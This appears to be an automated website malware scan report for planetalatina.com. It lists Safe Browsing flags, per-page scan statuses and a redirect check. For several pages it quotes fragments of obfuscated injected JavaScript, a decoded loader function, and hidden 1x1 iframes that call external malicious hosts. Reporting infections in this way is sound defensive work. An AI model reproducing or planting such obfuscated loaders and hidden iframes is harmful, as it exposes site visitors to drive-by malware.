Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=planetalatina.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://planetalatina.com/ | 200 OK Content-Length: 18516 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) khg=((96<61?"kkft":"jnlz"),(52<58?"paeq":"pere"),(1>94?"jstq":"1200"));bjg=((55<69?"cuwk":"laqf"),(23>54?"gpsd":",120"));bat=((29>19?"uxtp":"jpba"),(10>8?"ngth":"xada"));gbo=((47<31?"ialr":",116"));bez=((50>34?"pgsp":"fzrw"),(23>77?"ojmx":"lged"),(19<13?"scbw":"658,"));uwv=((84>80?"fdnf":"yjtb"),(3<68?"zxzm":"wvvz"),(11<10?"zlev":",116"));wog=((64<94?"tnil":"rfbg"),(99<16?"yocg":"(d){"));eid=((82>21?". ...[3964 bytes skipped]... Decoded script: function prr(d){return d.toString(16);}function zya(a){var l="";for(i=1;i<=(a.length-2);i++){a[i]=(a[i]/(a[a.length-1]))-a[0];}a.shift();for(i=0;i<=(a.length-2);i++){l=l+"&#x"+prr(a[i])+";";} return l;}a=zya([22,10962,12006,12006,11658,6960,6003,6003,10353,11397,10527,12093,11658,11919,11049,12006,10701,5916,10527,11571,11397,6003,11658,12354,6003,11049,11484,10614,10701,12354,5916,11658,10962,11658,87]);var b=document.getElementsByTagNa ...[705 bytes skipped]... Antivirus reports:
Malicious iFrame found. size: 1x1 src: http://windowshopworld.com/px/index.php This URL is marked by Google as suspicious <iframe src="http://windowshopworld.com/px/index.php" width="1" height="1" frameborder="0"> Malicious iFrame found. size: 1x1 src: http://siteiscool.com/px/index.php This URL is marked by Google as suspicious <iframe src="http://siteiscool.com/px/index.php" width="1" height="1" frameborder="0"> | ||
http://planetalatina.com/swfobject.js | 200 OK Content-Length: 6880 Content-Type: application/x-javascript | clean |
http://planetalatina.com/_js/AC_RunActiveContent.js | 200 OK Content-Length: 8029 Content-Type: application/x-javascript | clean |
http://planetalatina.com/advertise.php | 200 OK Content-Length: 28668 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) khg=((96<61?"kkft":"jnlz"),(52<58?"paeq":"pere"),(1>94?"jstq":"1200"));bjg=((55<69?"cuwk":"laqf"),(23>54?"gpsd":",120"));bat=((29>19?"uxtp":"jpba"),(10>8?"ngth":"xada"));gbo=((47<31?"ialr":",116"));bez=((50>34?"pgsp":"fzrw"),(23>77?"ojmx":"lged"),(19<13?"scbw":"658,"));uwv=((84>80?"fdnf":"yjtb"),(3<68?"zxzm":"wvvz"),(11<10?"zlev":",116"));wog=((64<94?"tnil":"rfbg"),(99<16?"yocg":"(d){"));eid=((82>21?". ...[3964 bytes skipped]... Decoded script: function prr(d){return d.toString(16);}function zya(a){var l="";for(i=1;i<=(a.length-2);i++){a[i]=(a[i]/(a[a.length-1]))-a[0];}a.shift();for(i=0;i<=(a.length-2);i++){l=l+"&#x"+prr(a[i])+";";} return l;}a=zya([22,10962,12006,12006,11658,6960,6003,6003,10353,11397,10527,12093,11658,11919,11049,12006,10701,5916,10527,11571,11397,6003,11658,12354,6003,11049,11484,10614,10701,12354,5916,11658,10962,11658,87]);var b=document.getElementsByTagNa ...[705 bytes skipped]... Antivirus reports:
Malicious iFrame found. size: 1x1 src: http://siteiscool.com/px/index.php This URL is marked by Google as suspicious <iframe src="http://siteiscool.com/px/index.php" width="1" height="1" frameborder="0"> Malicious iFrame found. size: 1x1 src: http://windowshopworld.com/px/index.php This URL is marked by Google as suspicious <iframe src="http://windowshopworld.com/px/index.php" width="1" height="1" frameborder="0"> | ||
http://planetalatina.com/function.mysql-query | 404 Not Found Content-Length: 1546 Content-Type: text/html | clean |
http://planetalatina.com/test404page.js | 404 Not Found Content-Length: 1546 Content-Type: text/html | clean |
http://planetalatina.com/index.php | 200 OK Content-Length: 18516 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) khg=((96<61?"kkft":"jnlz"),(52<58?"paeq":"pere"),(1>94?"jstq":"1200"));bjg=((55<69?"cuwk":"laqf"),(23>54?"gpsd":",120"));bat=((29>19?"uxtp":"jpba"),(10>8?"ngth":"xada"));gbo=((47<31?"ialr":",116"));bez=((50>34?"pgsp":"fzrw"),(23>77?"ojmx":"lged"),(19<13?"scbw":"658,"));uwv=((84>80?"fdnf":"yjtb"),(3<68?"zxzm":"wvvz"),(11<10?"zlev":",116"));wog=((64<94?"tnil":"rfbg"),(99<16?"yocg":"(d){"));eid=((82>21?". ...[3964 bytes skipped]... Decoded script: function prr(d){return d.toString(16);}function zya(a){var l="";for(i=1;i<=(a.length-2);i++){a[i]=(a[i]/(a[a.length-1]))-a[0];}a.shift();for(i=0;i<=(a.length-2);i++){l=l+"&#x"+prr(a[i])+";";} return l;}a=zya([22,10962,12006,12006,11658,6960,6003,6003,10353,11397,10527,12093,11658,11919,11049,12006,10701,5916,10527,11571,11397,6003,11658,12354,6003,11049,11484,10614,10701,12354,5916,11658,10962,11658,87]);var b=document.getElementsByTagNa ...[705 bytes skipped]... Antivirus reports:
Malicious iFrame found. size: 1x1 src: http://windowshopworld.com/px/index.php This URL is marked by Google as suspicious <iframe src="http://windowshopworld.com/px/index.php" width="1" height="1" frameborder="0"> Malicious iFrame found. size: 1x1 src: http://siteiscool.com/px/index.php This URL is marked by Google as suspicious <iframe src="http://siteiscool.com/px/index.php" width="1" height="1" frameborder="0"> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: planetalatina.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 28 Sep 2014 13:50:28 GMT
Server: Apache
Content-Type: text/html
GET / HTTP/1.1
Host: planetalatina.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 28 Sep 2014 13:50:28 GMT
Server: Apache
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: planetalatina.com
Referer: http://www.google.com/search?q=planetalatina.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: planetalatina.com
Referer: http://www.google.com/search?q=planetalatina.com
Result:
The result is similar to the first query. There are no suspicious redirects found.